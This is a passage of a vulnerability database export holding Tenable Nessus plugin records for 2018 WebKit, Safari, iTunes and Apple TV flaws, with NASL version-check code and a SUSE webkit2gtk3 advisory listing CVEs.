Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3687-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"Ubuntu Security Notice (C) 2018-2020 Canonical, Inc. / NASL script (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04|17\\.10|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 17.10 / 18.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"17.10\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.17.10.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.20.3-0ubuntu0.18.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = 
ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:24:07", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1. It is, therefore,\naffected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted\n web page, to execute arbitrary code or cause a denial of service\n (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. An unauthenticated,\n remote attacker can exploit this, via a specifically crafted web page,\n to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page\n that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary\n code (CVE-2018-4222).\n", "edition": 16, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-07-02T00:00:00", "title": "macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4277", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/a:apple:safari"], "id": "MACOSX_SAFARI11_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/126381", "sourceData": "#\n# (C) Tenable Network 
Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126381);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/07/05 9:53:32\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4201\",\n \"CVE-2018-4205\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\",\n \"CVE-2018-4247\",\n \"CVE-2018-4277\"\n );\n script_bugtraq_id(104358, 104366);\n\n script_name(english:\"macOS : Apple Safari < 11.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 11.1.1. It is, therefore,\naffected by multiple vulnerabilities.\n\n- A remote code execution vulnerability exists in WebKit due to improper memory handling.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted\n web page, to execute arbitrary code or cause a denial of service\n (CVE-2018-4199, CVE-2018-4201, CVE-2018-4218, CVE-2018-4233).\n\n- An information disclosure vulnerability exists in WebKit. 
An unauthenticated,\n remote attacker can exploit this, via a specifically crafted web page,\n to disclose potentially sensitive information (CVE-2018-4190).\n\n- An out-of-bounds read error exists in WebKit due to improper input validation.\n An unauthenticated, remote attacker can exploit this, via a specifically crafted web page\n that leverages a getWasmBufferFromValue during WebAssembly compilation to execute arbitrary\n code (CVE-2018-4222).\n\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208854\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 11.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n 
script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_apple_safari_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item('Host/MacOSX/Version');\nif (!os) audit(AUDIT_OS_NOT, 'Mac OS X or macOS');\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, 'Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13');\n\nget_kb_item_or_exit('MacOSX/Safari/Installed', exit_code:0);\npath = get_kb_item_or_exit('MacOSX/Safari/Path', exit_code:1);\nversion = get_kb_item_or_exit('MacOSX/Safari/Version', exit_code:1);\n\nfixed_version = '11.1.1';\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n 'Path', path,\n 'Installed version', version,\n 'Fixed version', fixed_version\n ),\n ordered_fields:make_list('Path', 'Installed version', 'Fixed version')\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Safari', version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:18:28", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. 
It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5.NASL", "href": "https://www.tenable.com/plugins/nessus/110384", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110384);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on 
the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.5\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:18:34", "description": "The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 25, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-06T00:00:00", "title": "Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_5_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/110383", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110383);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n 
\"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4224\",\n \"CVE-2018-4225\",\n \"CVE-2018-4226\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4246\"\n );\n script_bugtraq_id(103961, 104378);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-06-01-7\");\n\n script_name(english:\"Apple iTunes < 12.7.5 Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.5. It is, therefore, affected by multiple vulnerabilities\nin WebKit as referenced in the HT208852 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208852\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00006.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?375c8685\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4246\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.5\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:21:02", "description": 
"According to its banner, the version of Apple TV on the remote device\nis prior to 11.4. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-05T00:00:00", "title": "Apple TV < 11.4 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4232", "CVE-2018-4243", "CVE-2018-4200"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_4.NASL", "href": "https://www.tenable.com/plugins/nessus/110325", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110325);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\n \"CVE-2018-4188\",\n \"CVE-2018-4190\",\n \"CVE-2018-4192\",\n \"CVE-2018-4198\",\n \"CVE-2018-4199\",\n \"CVE-2018-4200\",\n \"CVE-2018-4201\",\n \"CVE-2018-4204\",\n \"CVE-2018-4206\",\n \"CVE-2018-4211\",\n \"CVE-2018-4214\",\n \"CVE-2018-4218\",\n \"CVE-2018-4222\",\n \"CVE-2018-4223\",\n \"CVE-2018-4224\",\n \"CVE-2018-4232\",\n \"CVE-2018-4233\",\n \"CVE-2018-4235\",\n \"CVE-2018-4237\",\n \"CVE-2018-4240\",\n \"CVE-2018-4241\",\n \"CVE-2018-4243\",\n \"CVE-2018-4246\",\n \"CVE-2018-4249\",\n \"CVE-2018-5383\"\n );\n script_bugtraq_id(\n 103957,\n 103958,\n 103961,\n 104378\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-6-01-6\");\n\n 
script_name(english:\"Apple TV < 11.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.4. It is, therefore, affected by multiple\nvulnerabilities as described in the HT208850 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208850\");\n # https://lists.apple.com/archives/security-announce/2018/Jun/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e8b8fb7\");\n # https://lists.apple.com/archives/security-announce/2018/Jul/msg00011.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b0bb7d4f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.4 or later. 
Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4241\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X libxpc MITM Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15L577\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:40:10", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in\n xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote\n attackers 
to spoof user-interface information (about\n whether the entire content is derived from a valid TLS\n session) via a crafted website that sends a 401\n Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote\n attackers to execute arbitrary code via special\n characters that trigger command injection (bsc#1075775,\n bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free\n (bsc#1092280).\n\n - CVE-2018-4204: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1092279).\n\n 